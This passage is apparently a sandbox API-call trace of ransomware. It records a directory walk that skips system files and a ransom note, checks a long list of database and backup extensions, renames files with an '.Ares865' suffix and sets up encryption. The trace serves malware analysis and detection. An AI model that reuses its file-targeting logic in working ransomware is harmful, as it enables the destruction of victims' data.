lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.927] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.927] CloseHandle (hObject=0x15c) returned 1 [0092.927] CloseHandle (hObject=0x118) returned 1 [0092.928] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.928] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.928] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.928] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dd18e40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3dd18e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3dd18e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x91d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0tvd.lnk", cAlternateFileName="")) returned 1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="aoldtz.exe") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2=".") returned 1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="..") returned 1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="windows") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="bootmgr") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="temp") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="pagefile.sys") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="boot") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="ids.txt") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="ntuser.dat") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="perflogs") returned -1 [0092.928] lstrcmpiW (lpString1="0tvd.lnk", lpString2="MSBuild") returned -1 [0092.928] lstrlenW (lpString="0tvd.lnk") returned 8 [0092.929] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0nc7 RNZKx5.lnk") returned 52 [0092.929] lstrcpyW (in: lpString1=0x2cce44a, lpString2="0tvd.lnk" | out: lpString1="0tvd.lnk") returned="0tvd.lnk" [0092.929] lstrlenW (lpString="0tvd.lnk") returned 8 [0092.929] lstrlenW (lpString="Ares865") returned 7 [0092.929] lstrcmpiW (lpString1="tvd.lnk", lpString2="Ares865") returned 1 [0092.929] lstrlenW (lpString=".dll") returned 4 [0092.929] lstrcmpiW (lpString1="0tvd.lnk", lpString2=".dll") returned 1 [0092.929] lstrlenW (lpString=".lnk") returned 4 [0092.929] lstrcmpiW (lpString1="0tvd.lnk", lpString2=".lnk") returned 1 [0092.929] lstrlenW (lpString=".ini") returned 4 [0092.929] lstrcmpiW (lpString1="0tvd.lnk", lpString2=".ini") returned 1 [0092.929] lstrlenW (lpString=".sys") returned 4 [0092.929] lstrcmpiW (lpString1="0tvd.lnk", lpString2=".sys") returned 1 [0092.929] lstrlenW (lpString="0tvd.lnk") returned 8 [0092.929] lstrlenW (lpString="bak") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.929] lstrlenW (lpString="ba_") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.929] lstrlenW (lpString="dbb") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.929] lstrlenW (lpString="vmdk") returned 4 [0092.929] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.929] lstrlenW (lpString="rar") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.929] lstrlenW (lpString="zip") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.929] lstrlenW (lpString="tgz") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.929] lstrlenW (lpString="vbox") returned 4 [0092.929] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.929] lstrlenW (lpString="vdi") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.929] lstrlenW (lpString="vhd") returned 3 [0092.929] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.929] lstrlenW (lpString="vhdx") returned 4 [0092.929] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.930] lstrlenW (lpString="avhd") returned 4 [0092.930] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.930] lstrlenW (lpString="db") returned 2 [0092.930] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.930] lstrlenW (lpString="db2") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.930] lstrlenW (lpString="db3") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.930] lstrlenW (lpString="dbf") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.930] lstrlenW (lpString="mdf") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.930] lstrlenW (lpString="mdb") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.930] lstrlenW (lpString="sql") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.930] lstrlenW (lpString="sqlite") returned 6 [0092.930] lstrcmpiW (lpString1="vd.lnk", lpString2="sqlite") returned 1 [0092.930] lstrlenW (lpString="sqlite3") returned 7 [0092.930] lstrcmpiW (lpString1="tvd.lnk", lpString2="sqlite3") returned 1 [0092.930] lstrlenW (lpString="sqlitedb") returned 8 [0092.930] lstrlenW (lpString="xml") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.930] lstrlenW (lpString="$er") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.930] lstrlenW (lpString="4dd") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.930] lstrlenW (lpString="4dl") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.930] lstrlenW (lpString="^^^") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.930] lstrlenW (lpString="abs") returned 3 [0092.930] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.930] lstrlenW (lpString="abx") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.931] lstrlenW (lpString="accdb") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accdb") returned 1 [0092.931] lstrlenW (lpString="accdc") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accdc") returned 1 [0092.931] lstrlenW (lpString="accde") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accde") returned 1 [0092.931] lstrlenW (lpString="accdr") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accdr") returned 1 [0092.931] lstrlenW (lpString="accdt") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accdt") returned 1 [0092.931] lstrlenW (lpString="accdw") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accdw") returned 1 [0092.931] lstrlenW (lpString="accft") returned 5 [0092.931] lstrcmpiW (lpString1="d.lnk", lpString2="accft") returned 1 [0092.931] lstrlenW (lpString="adb") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.931] lstrlenW (lpString="adb") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.931] lstrlenW (lpString="ade") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.931] lstrlenW (lpString="adf") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.931] lstrlenW (lpString="adn") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.931] lstrlenW (lpString="adp") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.931] lstrlenW (lpString="alf") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.931] lstrlenW (lpString="ask") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.931] lstrlenW (lpString="btr") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.931] lstrlenW (lpString="cat") returned 3 [0092.931] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.931] lstrlenW (lpString="cdb") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.932] lstrlenW (lpString="ckp") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.932] lstrlenW (lpString="cma") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.932] lstrlenW (lpString="cpd") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.932] lstrlenW (lpString="dacpac") returned 6 [0092.932] lstrcmpiW (lpString1="vd.lnk", lpString2="dacpac") returned 1 [0092.932] lstrlenW (lpString="dad") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.932] lstrlenW (lpString="dadiagrams") returned 10 [0092.932] lstrlenW (lpString="daschema") returned 8 [0092.932] lstrlenW (lpString="db-journal") returned 10 [0092.932] lstrlenW (lpString="db-shm") returned 6 [0092.932] lstrcmpiW (lpString1="vd.lnk", lpString2="db-shm") returned 1 [0092.932] lstrlenW (lpString="db-wal") returned 6 [0092.932] lstrcmpiW (lpString1="vd.lnk", lpString2="db-wal") returned 1 [0092.932] lstrlenW (lpString="dbc") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.932] lstrlenW (lpString="dbs") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.932] lstrlenW (lpString="dbt") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.932] lstrlenW (lpString="dbv") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.932] lstrlenW (lpString="dbx") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.932] lstrlenW (lpString="dcb") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.932] lstrlenW (lpString="dct") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.932] lstrlenW (lpString="dcx") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.932] lstrlenW (lpString="ddl") returned 3 [0092.932] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.932] lstrlenW (lpString="dlis") returned 4 [0092.932] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.933] lstrlenW (lpString="dp1") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.933] lstrlenW (lpString="dqy") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.933] lstrlenW (lpString="dsk") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.933] lstrlenW (lpString="dsn") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.933] lstrlenW (lpString="dtsx") returned 4 [0092.933] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.933] lstrlenW (lpString="dxl") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.933] lstrlenW (lpString="eco") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.933] lstrlenW (lpString="ecx") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.933] lstrlenW (lpString="edb") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.933] lstrlenW (lpString="epim") returned 4 [0092.933] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.933] lstrlenW (lpString="fcd") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.933] lstrlenW (lpString="fdb") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.933] lstrlenW (lpString="fic") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.933] lstrlenW (lpString="flexolibrary") returned 12 [0092.933] lstrlenW (lpString="fm5") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.933] lstrlenW (lpString="fmp") returned 3 [0092.933] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.933] lstrlenW (lpString="fmp12") returned 5 [0092.933] lstrcmpiW (lpString1="d.lnk", lpString2="fmp12") returned -1 [0092.933] lstrlenW (lpString="fmpsl") returned 5 [0092.933] lstrcmpiW (lpString1="d.lnk", lpString2="fmpsl") returned -1 [0092.933] lstrlenW (lpString="fol") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.934] lstrlenW (lpString="fp3") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.934] lstrlenW (lpString="fp4") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.934] lstrlenW (lpString="fp5") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.934] lstrlenW (lpString="fp7") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.934] lstrlenW (lpString="fpt") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.934] lstrlenW (lpString="frm") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.934] lstrlenW (lpString="gdb") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.934] lstrlenW (lpString="gdb") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.934] lstrlenW (lpString="grdb") returned 4 [0092.934] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.934] lstrlenW (lpString="gwi") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.934] lstrlenW (lpString="hdb") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.934] lstrlenW (lpString="his") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.934] lstrlenW (lpString="ib") returned 2 [0092.934] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.934] lstrlenW (lpString="idb") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.934] lstrlenW (lpString="ihx") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.934] lstrlenW (lpString="itdb") returned 4 [0092.934] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.934] lstrlenW (lpString="itw") returned 3 [0092.934] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.934] lstrlenW (lpString="jet") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.935] lstrlenW (lpString="jtx") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.935] lstrlenW (lpString="kdb") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.935] lstrlenW (lpString="kexi") returned 4 [0092.935] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.935] lstrlenW (lpString="kexic") returned 5 [0092.935] lstrcmpiW (lpString1="d.lnk", lpString2="kexic") returned -1 [0092.935] lstrlenW (lpString="kexis") returned 5 [0092.935] lstrcmpiW (lpString1="d.lnk", lpString2="kexis") returned -1 [0092.935] lstrlenW (lpString="lgc") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.935] lstrlenW (lpString="lwx") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.935] lstrlenW (lpString="maf") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.935] lstrlenW (lpString="maq") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.935] lstrlenW (lpString="mar") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.935] lstrlenW (lpString="marshal") returned 7 [0092.935] lstrcmpiW (lpString1="tvd.lnk", lpString2="marshal") returned 1 [0092.935] lstrlenW (lpString="mas") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.935] lstrlenW (lpString="mav") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.935] lstrlenW (lpString="maw") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.935] lstrlenW (lpString="mdbhtml") returned 7 [0092.935] lstrcmpiW (lpString1="tvd.lnk", lpString2="mdbhtml") returned 1 [0092.935] lstrlenW (lpString="mdn") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.935] lstrlenW (lpString="mdt") returned 3 [0092.935] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.935] lstrlenW (lpString="mfd") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.936] lstrlenW (lpString="mpd") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.936] lstrlenW (lpString="mrg") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.936] lstrlenW (lpString="mud") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.936] lstrlenW (lpString="mwb") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.936] lstrlenW (lpString="myd") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.936] lstrlenW (lpString="ndf") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.936] lstrlenW (lpString="nnt") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.936] lstrlenW (lpString="nrmlib") returned 6 [0092.936] lstrcmpiW (lpString1="vd.lnk", lpString2="nrmlib") returned 1 [0092.936] lstrlenW (lpString="ns2") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.936] lstrlenW (lpString="ns3") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.936] lstrlenW (lpString="ns4") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.936] lstrlenW (lpString="nsf") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.936] lstrlenW (lpString="nv") returned 2 [0092.936] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.936] lstrlenW (lpString="nv2") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.936] lstrlenW (lpString="nwdb") returned 4 [0092.936] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.936] lstrlenW (lpString="nyf") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.936] lstrlenW (lpString="odb") returned 3 [0092.936] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.936] lstrlenW (lpString="odb") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.937] lstrlenW (lpString="oqy") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.937] lstrlenW (lpString="ora") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.937] lstrlenW (lpString="orx") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.937] lstrlenW (lpString="owc") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.937] lstrlenW (lpString="p96") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.937] lstrlenW (lpString="p97") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.937] lstrlenW (lpString="pan") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.937] lstrlenW (lpString="pdb") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.937] lstrlenW (lpString="pdm") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.937] lstrlenW (lpString="pnz") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.937] lstrlenW (lpString="qry") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.937] lstrlenW (lpString="qvd") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.937] lstrlenW (lpString="rbf") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.937] lstrlenW (lpString="rctd") returned 4 [0092.937] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.937] lstrlenW (lpString="rod") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.937] lstrlenW (lpString="rodx") returned 4 [0092.937] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.937] lstrlenW (lpString="rpd") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.937] lstrlenW (lpString="rsd") returned 3 [0092.937] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.938] lstrlenW (lpString="sas7bdat") returned 8 [0092.938] lstrlenW (lpString="sbf") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.938] lstrlenW (lpString="scx") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.938] lstrlenW (lpString="sdb") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.938] lstrlenW (lpString="sdc") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.938] lstrlenW (lpString="sdf") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.938] lstrlenW (lpString="sis") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.938] lstrlenW (lpString="spq") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.938] lstrlenW (lpString="te") returned 2 [0092.938] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.938] lstrlenW (lpString="teacher") returned 7 [0092.938] lstrcmpiW (lpString1="tvd.lnk", lpString2="teacher") returned 1 [0092.938] lstrlenW (lpString="tmd") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.938] lstrlenW (lpString="tps") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.938] lstrlenW (lpString="trc") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.938] lstrlenW (lpString="trc") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.938] lstrlenW (lpString="trm") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.938] lstrlenW (lpString="udb") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.938] lstrlenW (lpString="udl") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.938] lstrlenW (lpString="usr") returned 3 [0092.938] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.939] lstrlenW (lpString="v12") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.939] lstrlenW (lpString="vis") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.939] lstrlenW (lpString="vpd") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.939] lstrlenW (lpString="vvv") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.939] lstrlenW (lpString="wdb") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.939] lstrlenW (lpString="wmdb") returned 4 [0092.939] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.939] lstrlenW (lpString="wrk") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.939] lstrlenW (lpString="xdb") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.939] lstrlenW (lpString="xld") returned 3 [0092.939] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.939] lstrlenW (lpString="xmlff") returned 5 [0092.939] lstrcmpiW (lpString1="d.lnk", lpString2="xmlff") returned -1 [0092.939] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0tvd.lnk.Ares865") returned 53 [0092.939] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0tvd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0tvd.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0tvd.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0tvd.lnk.ares865"), dwFlags=0x1) returned 1 [0092.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0tvd.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0tvd.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2333) returned 1 [0092.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.941] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.941] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.941] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.941] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.942] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc20, lpName=0x0) returned 0x15c [0092.942] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc20) returned 0x190000 [0092.942] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.943] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.943] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.943] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: 